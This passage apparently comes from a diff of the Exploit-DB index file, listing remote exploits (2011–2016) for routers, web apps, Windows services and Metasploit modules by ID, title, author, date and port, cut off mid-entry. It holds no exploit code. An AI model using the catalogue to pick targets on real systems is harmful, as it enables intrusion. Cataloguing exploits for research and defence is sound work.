-38671,exploits/hardware/remote/38671.txt,"Barracuda CudaTel - Multiple Cross-Site Scripting Vulnerabilities",2013-07-17,"Benjamin Kunz Mejri",hardware,remote, -38680,exploits/linux/remote/38680.html,"xmonad XMonad.Hooks.DynamicLog Module - Multiple Remote Command Injection Vulnerabilities",2013-07-26,"Joachim Breitner",linux,remote, -38824,exploits/hardware/remote/38824.html,"Fortinet FortiAnalyzer - Cross-Site Request Forgery",2013-10-12,"William Costa",hardware,remote, -38692,exploits/hardware/remote/38692.txt,"AlgoSec Firewall Analyzer - Cross-Site Scripting",2013-08-16,"Asheesh kumar Mani Tripathi",hardware,remote, -38694,exploits/windows/remote/38694.txt,"HTC Sync Manager - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2013-08-11,Iranian_Dark_Coders_Team,windows,remote, -38715,exploits/hardware/remote/38715.txt,"D-Link DIR-815 / DIR-850L - SSDP Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,1900 -38716,exploits/hardware/remote/38716.txt,"D-Link DIR-890L/R - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38717,exploits/hardware/remote/38717.txt,"D-Link DIR-866L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38718,exploits/hardware/remote/38718.txt,"D-Link DIR-825 (vC) - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38719,exploits/hardware/remote/38719.txt,"D-Link DIR-818W - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38720,exploits/hardware/remote/38720.txt,"D-Link DIR-817LW - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38721,exploits/hardware/remote/38721.txt,"D-Link DIR-815 - Multiple Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38722,exploits/hardware/remote/38722.txt,"D-Link DIR-645 - Multiple UPNP Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38723,exploits/hardware/remote/38723.txt,"D-Link DIR-615 - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38724,exploits/hardware/remote/38724.txt,"D-Link DIR-601 - Command Injection",2015-11-16,"Samuel Huntley",hardware,remote,80 -38725,exploits/hardware/remote/38725.txt,"D-Link DIR-880L - Multiple Buffer Overflow Vulnerabilities",2015-11-16,"Samuel Huntley",hardware,remote,80 -38726,exploits/hardware/remote/38726.txt,"D-Link DGL5500 - HNAP Buffer Overflow",2015-11-16,"Samuel Huntley",hardware,remote,80 -38730,exploits/php/remote/38730.py,"ClipperCMS 1.3.0 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 -38731,exploits/php/remote/38731.py,"XCart 5.2.6 - Code Execution",2015-11-16,"Curesec Research Team",php,remote,80 -38732,exploits/php/remote/38732.rb,"Idera Up.Time Monitoring Station 7.0 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 -38733,exploits/php/remote/38733.rb,"Idera Up.Time Monitoring Station 7.4 - 'post2file.php' Arbitrary File Upload (Metasploit)",2015-11-16,Metasploit,php,remote,9999 -38741,exploits/linux/remote/38741.txt,"Nmap - Arbitrary File Write",2013-08-06,"Piotr Duszynski",linux,remote, -38742,exploits/windows/remote/38742.txt,"Aloaha PDF Suite - Stack Based Buffer Overflow",2013-08-28,"Marcos Accossatto",windows,remote, -38764,exploits/hardware/remote/38764.rb,"F5 iControl - 'iCall::Script' Root Command Execution (Metasploit)",2015-11-19,Metasploit,hardware,remote,443 -38766,exploits/multiple/remote/38766.java,"Mozilla Firefox 9.0.1 - Same Origin Policy Security Bypass",2013-09-17,"Takeshi Terada",multiple,remote, -38797,exploits/php/remote/38797.rb,"Joomla! 3.4.4 Component Content History - SQL Injection / Remote Code Execution (Metasploit)",2015-11-23,Metasploit,php,remote,80 -38802,exploits/multiple/remote/38802.txt,"Oracle GlassFish Server 2.1.1/3.0.1 - Multiple Subcomponent Resource Identifier Traversal Arbitrary File Access",2013-10-15,"Alex Kouzemtchenko",multiple,remote, -38804,exploits/hardware/remote/38804.py,"Level One Enterprise Access Point (Multiple Devices) - 'backupCfg.cgi' Security Bypass",2013-10-15,"Richard Weinberger",hardware,remote, -38805,exploits/multiple/remote/38805.txt,"SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure",2015-11-25,"Igor Bulatenko",multiple,remote, -38809,exploits/php/remote/38809.php,"PHP Point Of Sale - 'ofc_upload_image.php' Remote Code Execution",2013-10-18,Gabby,php,remote, -38810,exploits/hardware/remote/38810.py,"D-Link / PLANEX COMMUNICATIONS - 'RuntimeDiagnosticPing()' Remote Stack Buffer Overflow",2013-10-14,"Craig Heffner",hardware,remote, -38812,exploits/multiple/remote/38812.txt,"DELL Quest One Password Manager - CAPTCHA Security Bypass",2011-10-21,"Johnny Bravo",multiple,remote, -38813,exploits/multiple/remote/38813.txt,"Apache Shindig - XML External Entity Information Disclosure",2013-10-21,"Kousuke Ebihara",multiple,remote, -38818,exploits/multiple/remote/38818.xml,"Openbravo ERP - XML External Entity Information Disclosure",2013-10-30,"Tod Beardsley",multiple,remote, -38821,exploits/android/remote/38821.py,"Google Android - Signature Verification Security Bypass",2013-11-04,"Jay Freeman",android,remote, -38825,exploits/multiple/remote/38825.xml,"IBM Cognos Business Intelligence - XML External Entity Information Disclosure",2013-10-11,IBM,multiple,remote, -38826,exploits/linux/remote/38826.py,"Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure",2013-12-10,"Mathy Vanhoef",linux,remote, -38827,exploits/php/remote/38827.txt,"Nagios XI - 'tfPassword' SQL Injection",2013-12-13,"Denis Andzakovic",php,remote, -38829,exploits/windows/remote/38829.py,"Easy File Sharing Web Server 7.2 - Remote Buffer Overflow (SEH) (DEP Bypass + ROP)",2015-11-30,Knaps,windows,remote, -36025,exploits/windows/remote/36025.py,"Achat 0.150 beta7 - Remote Buffer Overflow",2015-02-08,"KAhara MAnhara",windows,remote, -38845,exploits/multiple/remote/38845.txt,"SKIDATA Freemotion.Gate - Unauthenticated Web Services Multiple Command Execution Vulnerabilities",2013-11-19,"Dennis Kelly",multiple,remote, -38846,exploits/multiple/remote/38846.txt,"Nginx 1.1.17 - URI Processing SecURIty Bypass",2013-11-19,"Ivan Fratric",multiple,remote, -38849,exploits/cgi/remote/38849.rb,"Advantech Switch - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2015-12-02,Metasploit,cgi,remote, -38850,exploits/hardware/remote/38850.txt,"Thomson Reuters Velocity Analytics - Remote Code Injection",2013-11-22,"Eduardo Gonzalez",hardware,remote, -38851,exploits/hardware/remote/38851.html,"LevelOne WBR-3406TX Router - Cross-Site Request Forgery",2013-11-15,"Yakir Wizman",hardware,remote, -38859,exploits/windows/remote/38859.rb,"Oracle BeeHive 2 - voice-servlet processEvaluation() (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 -38860,exploits/windows/remote/38860.rb,"Oracle BeeHive 2 - voice-servlet prepareAudioToPlay() Arbitrary File Upload (Metasploit)",2015-12-03,Metasploit,windows,remote,7777 -38900,exploits/php/remote/38900.rb,"phpFileManager 0.9.8 - Remote Code Execution (Metasploit)",2015-12-08,Metasploit,php,remote,80 -38905,exploits/multiple/remote/38905.rb,"Atlassian HipChat for Jira Plugin - Velocity Template Injection (Metasploit)",2015-12-08,Metasploit,multiple,remote,8080 -38910,exploits/windows/remote/38910.txt,"Hancom Office - '.hml' File Processing Heap Buffer Overflow",2013-12-19,diroverflow,windows,remote, -38911,exploits/windows/remote/38911.txt,"Microsoft Windows Media Center Library - Parsing Remote Code Execution aka 'self-executing' MCL File",2015-12-09,"Eduardo Braun Prado",windows,remote, -38912,exploits/windows/remote/38912.txt,"Microsoft Windows Media Center - '.Link' File Incorrectly Resolved Reference (MS15-134)",2015-12-09,"Core Security",windows,remote, -38918,exploits/windows/remote/38918.txt,"Microsoft Office / COM Object - 'els.dll' DLL Planting (MS15-134)",2015-12-09,"Google Security Research",windows,remote, -38923,exploits/windows/remote/38923.txt,"Apple Safari For Windows - PhishingAlert Security Bypass",2013-12-07,Jackmasa,windows,remote, -39097,exploits/linux/remote/39097.txt,"RedHat Piranha - Remote Security Bypass",2013-12-11,"Andreas Schiermeier",linux,remote, -38964,exploits/hardware/remote/38964.rb,"Siemens Simatic S7 1200 - CPU Command Module (Metasploit)",2015-12-14,"Nguyen Manh Hung",hardware,remote,102 -38968,exploits/windows/remote/38968.txt,"Microsoft Office / COM Object - DLL Planting with 'comsvcs.dll' Delay Load of 'mqrt.dll' (MS15-132)",2015-12-14,"Google Security Research",windows,remote, -38973,exploits/multiple/remote/38973.rb,"Legend Perl IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,multiple,remote, -38974,exploits/multiple/remote/38974.rb,"Xdh / LinuxNet Perlbot / fBot IRC Bot - Remote Code Execution (Metasploit)",2015-12-14,Metasploit,multiple,remote, -38982,exploits/jsp/remote/38982.rb,"ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)",2015-12-15,Metasploit,jsp,remote,8020 -38983,exploits/java/remote/38983.rb,"Jenkins CLI - RMI Java Deserialization (Metasploit)",2015-12-15,Metasploit,java,remote,8080 -39007,exploits/java/remote/39007.txt,"FireEye - Wormable Remote Code Execution in MIP JAR Analysis",2015-12-16,"Tavis Ormandy & Natalie Silvanovich",java,remote, -39008,exploits/windows/remote/39008.py,"Easy File Sharing Web Server 7.2 - GET Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 -39009,exploits/windows/remote/39009.py,"Easy File Sharing Web Server 7.2 - HEAD Request Buffer Overflow (SEH)",2015-12-16,ArminCyber,windows,remote,80 -39018,exploits/multiple/remote/39018.txt,"Oracle Supply Chain Products Suite - Remote Security",2014-01-14,Oracle,multiple,remote, -39074,exploits/cgi/remote/39074.txt,"Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution",2014-02-03,"Josue Rojas",cgi,remote, -39105,exploits/windows/remote/39105.py,"VideoCharge Studio - 'CHTTPResponse::GetHttpResponse()' Remote Stack Buffer Overflow",2014-02-19,"Julien Ahrens",windows,remote, -39104,exploits/multiple/remote/39104.py,"Dassault Systemes Catia - Remote Stack Buffer Overflow",2014-02-19,"Mohamed Shetta",multiple,remote, -39089,exploits/hardware/remote/39089.txt,"NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution",2014-02-05,"Marcel Mangold",hardware,remote, -39114,exploits/ios/remote/39114.txt,"Apple iOS 4.2.1 - 'facetime-audio://' Security Bypass",2014-03-10,"Guillaume Ross",ios,remote, -39115,exploits/multiple/remote/39115.py,"ET - Chat Password Reset Security Bypass",2014-03-09,IRH,multiple,remote, -39119,exploits/windows/remote/39119.py,"KiTTY Portable 0.65.0.2p (Windows XP/7/10) - Chat Remote Buffer Overflow (SEH)",2015-12-29,"Guillaume Kaddouch",windows,remote, -39138,exploits/hardware/remote/39138.html,"ICOMM 610 Wireless Modem - Cross-Site Request Forgery",2014-04-12,"Blessen Thomas",hardware,remote, -39227,exploits/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrolment",2016-01-12,"Daniel Lawson",hardware,remote, -39154,exploits/hardware/remote/39154.txt,"COMTREND CT-5361T Router - 'Password.cgi' Cross-Site Request Forgery (Admin Password Manipulation)",2014-04-21,"TUNISIAN CYBER",hardware,remote, -39155,exploits/linux/remote/39155.txt,"lxml - 'clean_html' Security Bypass",2014-04-15,"Maksim Kochkin",linux,remote, -39161,exploits/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)",2016-01-04,"Avinash Thapa",windows,remote, -39175,exploits/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk - Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote, -39186,exploits/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 - Authentication Bypass",2014-05-15,jkmac,multiple,remote, -39194,exploits/hardware/remote/39194.txt,"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,remote, -39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",hardware,remote, -39196,exploits/linux/remote/39196.py,"Apache mod_wsgi - Information Disclosure",2014-05-21,"Buck Golemon",linux,remote, -39205,exploits/multiple/remote/39205.txt,"Castor Library - XML External Entity Information Disclosure",2014-05-27,"Ron Gutierrez",multiple,remote, -39209,exploits/hardware/remote/39209.txt,"Huawei E303 Router - Cross-Site Request Forgery",2014-05-30,"Benjamin Daniel Mussler",hardware,remote, -39215,exploits/windows/remote/39215.py,"Konica Minolta FTP Utility 1.00 - CWD Command Overflow (SEH)",2016-01-11,TOMIWA,windows,remote,21 -39218,exploits/windows/remote/39218.html,"Trend Micro - node.js HTTP Server Listening on localhost Can Execute Commands",2016-01-11,"Google Security Research",windows,remote, -39222,exploits/multiple/remote/39222.txt,"Foreman Smart-Proxy - Remote Command Injection",2014-06-05,"Lukas Zapletal",multiple,remote, -39224,exploits/hardware/remote/39224.py,"Fortigate OS 4.x < 5.0.7 - SSH Backdoor Access",2016-01-12,operator8203,hardware,remote,22 -39258,exploits/multiple/remote/39258.txt,"Alfresco - '/proxy?endpoint' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote, -39259,exploits/multiple/remote/39259.txt,"Alfresco - '/cmisbrowser?url' Server-Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote, -39455,exploits/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 - Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote, -39278,exploits/hardware/remote/39278.txt,"Barracuda Web Application Firewall - Authentication Bypass",2014-08-04,"Nick Hayes",hardware,remote, -39292,exploits/multiple/remote/39292.pl,"Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure",2014-08-26,"Eric Sesterhenn",multiple,remote, -39293,exploits/multiple/remote/39293.pl,"Granding MA300 - Weak Pin Encryption Brute Force",2014-08-26,"Eric Sesterhenn",multiple,remote, -39295,exploits/multiple/remote/39295.js,"Mozilla Firefox 9.0.1 / Thunderbird 3.1.20 - Information Disclosure",2014-09-02,"Michal Zalewski",multiple,remote, -39314,exploits/hardware/remote/39314.c,"Aztech Modem Routers - Information Disclosure",2014-09-15,"Eric Fajardo",hardware,remote, -39316,exploits/hardware/remote/39316.pl,"Aztech Modem Routers - Session Hijacking",2014-09-15,"Eric Fajardo",hardware,remote, -39318,exploits/multiple/remote/39318.txt,"Laravel - 'Hash::make()' Password Truncation Security",2014-09-16,"Pichaya Morimoto",multiple,remote, -39328,exploits/android/remote/39328.rb,"Google Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555 -39437,exploits/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote, -39439,exploits/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote, -39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote, -39514,exploits/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80 -39515,exploits/windows/remote/39515.rb,"NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080 -39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote, -39554,exploits/php/remote/39554.rb,"PHP Utility Belt - Remote Code Execution (Metasploit)",2016-03-11,Metasploit,php,remote,80 -39568,exploits/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Remote Command Injection (Shellshock)",2016-03-16,thatchriseckert,hardware,remote,443 -39569,exploits/multiple/remote/39569.py,"OpenSSH 7.2p1 - Authenticated xauth Command Injection",2016-03-16,tintinweb,multiple,remote,22 -39585,exploits/windows/remote/39585.py,"Sysax Multi Server 6.50 - HTTP File Share Overflow Remote Code Execution (SEH)",2016-03-21,"Paul Purcell",windows,remote,80 -39596,exploits/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote, -39599,exploits/windows/remote/39599.txt,"Comodo AntiVirus - Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote, -39631,exploits/multiple/remote/39631.txt,"Adobe Flash - Object.unwatch Use-After-Free",2016-03-29,"Google Security Research",multiple,remote, -39632,exploits/linux/remote/39632.py,"LShell 0.9.15 - Remote Code Execution",2012-12-30,drone,linux,remote, -39639,exploits/php/remote/39639.rb,"ATutor 2.2.1 - Directory Traversal / Remote Code Execution (Metasploit)",2016-03-30,Metasploit,php,remote,80 -39640,exploits/android/remote/39640.txt,"Google Android 5.0.1 - Metaphor Stagefright (ASLR Bypass)",2016-03-30,NorthBit,android,remote, -39643,exploits/java/remote/39643.rb,"Apache Jetspeed - Arbitrary File Upload (Metasploit)",2016-03-31,Metasploit,java,remote,8080 -39645,exploits/multiple/remote/39645.php,"PHP 5.5.33/7.0.4 - SNMP Format String",2016-04-01,"Andrew Kramer",multiple,remote, -39693,exploits/unix/remote/39693.rb,"Dell KACE K1000 - Arbitrary File Upload (Metasploit)",2016-04-13,Metasploit,unix,remote, -39698,exploits/windows/remote/39698.html,"Microsoft Internet Explorer 9/10/11 - 'CDOMStringDataList::InitFromString' Out-of-Bounds Read (MS15-112)",2016-04-14,"Ashfaq Ansari",windows,remote, -39708,exploits/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload (Metasploit)",2016-04-18,Metasploit,multiple,remote,80 -39729,exploits/win_x86/remote/39729.rb,"PCMan FTP Server 2.0.7 - 'RENAME' Remote Buffer Overflow (Metasploit)",2016-04-25,"Jonathan Smith",win_x86,remote,21 -39735,exploits/windows/remote/39735.rb,"Advantech Webaccess Dashboard Viewer - Arbitrary File Upload (Metasploit)",2016-04-26,Metasploit,windows,remote,80 -39736,exploits/linux/remote/39736.txt,"libgd 2.1.1 - Signedness Heap Overflow",2016-04-26,"Hans Jerry Illikainen",linux,remote, -39742,exploits/php/remote/39742.txt,"PHP 7.0.5 - ZipArchive::getFrom* Integer Overflow",2016-04-28,"Hans Jerry Illikainen",php,remote, -39755,exploits/windows/remote/39755.py,"Acunetix WVS 10 - Remote Command Execution",2016-05-02,"Daniele Linguaglossa",windows,remote, -39756,exploits/linux/remote/39756.rb,"Apache Struts - Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-05-02,Metasploit,linux,remote,8080 -39783,exploits/windows/remote/39783.py,"Dell SonicWALL Scrutinizer 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote, -39792,exploits/ruby/remote/39792.rb,"Ruby on Rails - Development Web Console (v2) Code Execution (Metasploit)",2016-05-09,Metasploit,ruby,remote,3000 -39805,exploits/windows/remote/39805.txt,"Microsoft Windows Media Center - '.MCL' File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote, -39823,exploits/hardware/remote/39823.py,"Cisco ASA Software 8.x/9.x - IKEv1 / IKEv2 Buffer Overflow",2016-05-17,"Exodus Intelligence",hardware,remote, -39836,exploits/multiple/remote/39836.rb,"Dell SonicWALL Scrutinizer 11.01 - methodDetail SQL Injection (Metasploit)",2016-05-17,Metasploit,multiple,remote, -39852,exploits/java/remote/39852.rb,"Oracle Application Testing Suite (ATS) - Arbitrary File Upload (Metasploit)",2016-05-25,Metasploit,java,remote,8088 -39853,exploits/unix/remote/39853.rb,"Ubiquiti airOS - Arbitrary File Upload (Metasploit)",2016-05-25,Metasploit,unix,remote,443 -39854,exploits/java/remote/39854.txt,"PowerFolder Server 10.4.321 - Remote Code Execution",2016-05-25,"Hans-Martin Muench",java,remote, -39858,exploits/windows/remote/39858.py,"HP Data Protector A.09.00 - Arbitrary Command Execution",2016-05-26,"Ian Lovering",windows,remote, -39874,exploits/windows/remote/39874.rb,"HP Data Protector A.09.00 - Encrypted Communications Arbitrary Command Execution (Metasploit)",2016-05-31,"Ian Lovering",windows,remote, -39907,exploits/windows/remote/39907.rb,"Poison Ivy 2.1.x (C2 Server) - Remote Buffer Overflow (Metasploit)",2016-06-10,"Jos Wetzels",windows,remote,3460 -39917,exploits/cgi/remote/39917.rb,"IPFire - 'proxy.cgi' Remote Code Execution (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 -39918,exploits/cgi/remote/39918.rb,"IPFire - Bash Environment Variable Command Injection (Shellshock) (Metasploit)",2016-06-10,Metasploit,cgi,remote,444 -39919,exploits/multiple/remote/39919.rb,"Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution (Metasploit)",2016-06-10,Metasploit,multiple,remote,8080 -40441,exploits/hardware/remote/40441.py,"Grandsteam GXV3611_HD - SQL Injection",2016-09-29,pizza1337,hardware,remote, -39945,exploits/linux/remote/39945.rb,"Apache Continuum - Arbitrary Command Execution (Metasploit)",2016-06-14,Metasploit,linux,remote,8080 -39958,exploits/linux/remote/39958.rb,"Bomgar Remote Support - Unauthenticated Code Execution (Metasploit)",2016-06-15,"Markus Wulftange",linux,remote,443 -39973,exploits/linux/remote/39973.rb,"op5 7.1.9 - Configuration Command Execution (Metasploit)",2016-06-17,Metasploit,linux,remote,443 -39985,exploits/windows/remote/39985.rb,"DarkComet Server - Arbitrary File Download (Metasploit)",2016-06-21,"Jos Wetzels",windows,remote,1604 -39999,exploits/win_x86-64/remote/39999.rb,"PCMan FTP Server 2.0.7 - 'ls' Remote Buffer Overflow (Metasploit)",2016-06-22,quanyechavshuo,win_x86-64,remote,21 -40004,exploits/php/remote/40004.rb,"Wolf CMS 0.8.2 - Arbitrary File Upload (Metasploit)",2016-06-22,s0nk3y,php,remote,80 -40064,exploits/linux/remote/40064.txt,"GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution",2016-07-06,"Dawid Golunski",linux,remote, -40067,exploits/linux/remote/40067.rb,"Nagios XI Chained - Remote Code Execution (Metasploit)",2016-07-06,Metasploit,linux,remote,80 -40108,exploits/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress - Remote Code Execution (Metasploit)",2016-07-13,Metasploit,linux,remote,443 -40113,exploits/linux/remote/40113.txt,"OpenSSHd 7.2p2 - Username Enumeration (PoC)",2016-07-18,"Eddie Harari",linux,remote,22 -40119,exploits/linux/remote/40119.md,"DropBearSSHD 2015.71 - Command Injection",2016-03-03,tintinweb,linux,remote, -40120,exploits/hardware/remote/40120.py,"Meinberg NTP Time Server ELX800/GPS M4x V5.30p - Remote Command Execution / Escalate Privileges",2016-07-17,b0yd,hardware,remote, -40846,exploits/android/remote/40846.html,"Google Android - 'BadKernel' Remote Code Execution",2016-11-28,"Guang Gong",android,remote, -40125,exploits/multiple/remote/40125.py,"Axis Communications MPQT/PACS 5.20.x - Server-Side Include Daemon Remote Format String",2016-07-19,bashis,multiple,remote, -40130,exploits/php/remote/40130.rb,"Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)",2016-07-20,"Mehmet Ince",php,remote,80 -40136,exploits/linux/remote/40136.py,"OpenSSH 7.2p2 - Username Enumeration",2016-07-20,0_o,linux,remote,22 -40138,exploits/windows/remote/40138.py,"TFTP Server 1.4 - 'WRQ' Remote Buffer Overflow (Egghunter)",2016-07-21,"Karn Ganeshen",windows,remote,69 -40142,exploits/php/remote/40142.php,"Apache 2.4.7 + PHP 7.0.2 - 'openssl_seal()' Uninitialized Memory Code Execution",2016-02-01,akat1,php,remote, -40144,exploits/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution",2016-07-23,Raz0r,php,remote, -40146,exploits/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 -40147,exploits/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000 -40162,exploits/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,linux,remote,8000 -40167,exploits/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23 -40170,exploits/python/remote/40170.rb,"Centreon 2.5.3 - Web Useralias Command Execution (Metasploit)",2016-07-27,Metasploit,python,remote,80 -40176,exploits/linux/remote/40176.rb,"Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)",2016-07-29,xort,linux,remote,8000 -40177,exploits/linux/remote/40177.rb,"Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)",2016-07-29,xort,linux,remote,8000 -40178,exploits/windows/remote/40178.py,"Easy File Sharing Web Server 7.2 - Remote Overflow (Egghunter) (SEH)",2016-07-29,ch3rn0byl,windows,remote,80 -40200,exploits/hardware/remote/40200.txt,"NUUO NVRmini2 / NVRsolo / Crystal Devices / NETGEAR ReadyNAS Surveillance Application - Multiple Vulnerabilities",2016-08-05,"Pedro Ribeiro",hardware,remote, -40201,exploits/linux/remote/40201.txt,"ntop/nbox 2.3 < 2.5 - Multiple Vulnerabilities",2016-08-05,"Javier Marcos",linux,remote, -40232,exploits/linux/remote/40232.py,"FreePBX 13/14 - Remote Command Execution / Privilege Escalation",2016-08-12,pgt,linux,remote, -40280,exploits/windows/remote/40280.py,"Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)",2016-02-26,ohnozzy,windows,remote, -40234,exploits/windows/remote/40234.py,"EasyFTP Server 1.7.0.11 - 'APPE' Remote Buffer Overflow",2012-03-03,Swappage,windows,remote, -40279,exploits/windows/remote/40279.py,"Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)",2016-02-26,ohnozzy,windows,remote, -40235,exploits/hardware/remote/40235.py,"Samsung Smart Home Camera SNH-P-6410 - Command Injection",2016-08-14,PentestPartners,hardware,remote, -40258,exploits/hardware/remote/40258.txt,"Cisco ASA 8.x - 'EXTRABACON' Authentication Bypass",2016-08-18,"Shadow Brokers",hardware,remote,161 -40275,exploits/hardware/remote/40275.txt,"TOPSEC Firewalls - 'ELIGIBLEBACHELOR' Remote Command Execution",2016-08-19,"Shadow Brokers",hardware,remote, -40294,exploits/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80 -40436,exploits/android/remote/40436.rb,"Google Android 5.0 < 5.1.1 - 'Stagefright' .MP4 tx3g Integer Overflow (Metasploit)",2016-09-27,Metasploit,android,remote, -40445,exploits/windows/remote/40445.txt,"DWebPro 8.4.2 - Multiple Vulnerabilities",2016-10-03,Tulpa,windows,remote, -40452,exploits/windows/remote/40452.py,"Disk Pulse Enterprise 9.0.34 - 'Login' Remote Buffer Overflow",2016-10-03,Tulpa,windows,remote,80 -40455,exploits/windows/remote/40455.py,"VX Search Enterprise 9.0.26 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 -40456,exploits/windows/remote/40456.py,"Sync Breeze Enterprise 8.9.24 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 -40457,exploits/windows/remote/40457.py,"Dup Scout Enterprise 9.0.28 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 -40458,exploits/windows/remote/40458.py,"Disk Sorter Enterprise 9.0.24 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 -40459,exploits/windows/remote/40459.py,"Disk Savvy Enterprise 9.0.32 - 'Login' Remote Buffer Overflow",2016-10-05,Tulpa,windows,remote,80 -40472,exploits/hardware/remote/40472.py,"Billion 7700NR4 Router - Remote Command Execution",2016-10-06,R-73eN,hardware,remote, -40474,exploits/hardware/remote/40474.txt,"Exagate WEBPack Management System - Multiple Vulnerabilities",2016-10-06,"Halil Dalabasmaz",hardware,remote, -40491,exploits/multiple/remote/40491.py,"HP Client 9.1/9.0/8.1/7.9 - Command Injection",2016-10-10,SlidingWindow,multiple,remote, -40507,exploits/linux/remote/40507.py,"Subversion 1.6.6/1.6.12 - Code Execution",2016-10-12,GlacierZ0ne,linux,remote, -40561,exploits/multiple/remote/40561.rb,"Ruby on Rails - Dynamic Render File Upload / Remote Code Execution (Metasploit)",2016-10-17,Metasploit,multiple,remote, -40589,exploits/hardware/remote/40589.html,"MiCasaVerde VeraLite - Remote Code Execution",2016-10-20,"Jacob Baines",hardware,remote, -40609,exploits/linux/remote/40609.rb,"Hak5 WiFi Pineapple 2.4 - Preconfiguration Command Injection (Metasploit)",2016-10-20,Metasploit,linux,remote,1471 -40610,exploits/linux/remote/40610.rb,"OpenNMS - Java Object Unserialization Remote Code Execution (Metasploit)",2016-10-20,Metasploit,linux,remote,1099 -40619,exploits/hardware/remote/40619.py,"TrendMicro InterScan Web Security Virtual Appliance - Remote Command Injection (Shellshock)",2016-10-21,"Hacker Fantastic",hardware,remote, -40633,exploits/hardware/remote/40633.py,"Komfy Switch with Camera DKZ-201S/W - WiFi Password 